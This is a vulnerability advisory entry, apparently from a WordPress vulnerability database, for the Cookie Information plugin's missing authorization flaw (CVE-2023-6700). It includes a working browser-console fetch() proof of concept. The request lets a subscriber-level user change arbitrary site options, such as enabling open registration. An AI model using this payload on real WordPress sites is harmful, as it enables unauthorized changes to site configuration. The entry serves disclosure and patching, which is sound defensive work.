Lucene search
WpvulndbWPEX-ID:0C207E0A-F52D-4A59-A7B1-94E4A19B45F6HistoryJan 31, 2024 - 12:00 a.m.
Cookie Information < 2.0.23 - Subscriber+ Arbitrary Options Update
2024-01-3100:00:00
wpvulndb
32
cookie information
arbitrary options update
developer console
web browser
blog
subscriber user
command
admin-ajax.php
security
exploit
Description The plugin is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler, allowing any authenticated users, such as subscriber to update arbitrary site options
Run the below command in the developer console of the web browser while being on the blog as subscriber user to set the users_can_register option to true.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=wpgdprc_update_integration&data={"name":"users_can_register","value":true,"type":"yolo"}&security=' + wpgdprcAdmin['ajaxNonce'],
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));Related
nvd
nvd
CVE-2023-6700
2024-02-05 22:15:56
githubexploit
githubexploit
Exploit for Missing Authorization in Cookieinformation Wp-Gdpr-Compliance
2024-01-30 10:32:54
cve
cve
CVE-2023-6700
2024-02-05 22:15:56
wpvulndb
wpvulndb
Cookie Information < 2.0.23 - Subscriber+ Arbitrary Options Update
2024-01-31 00:00:00
cvelist
cvelist
CVE-2023-6700
2024-02-05 21:21:41
wordfence
wordfence
prion
prion
Information disclosure
2024-02-05 22:15:00
8.7 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
19.5%
Related for WPEX-ID:0C207E0A-F52D-4A59-A7B1-94E4A19B45F6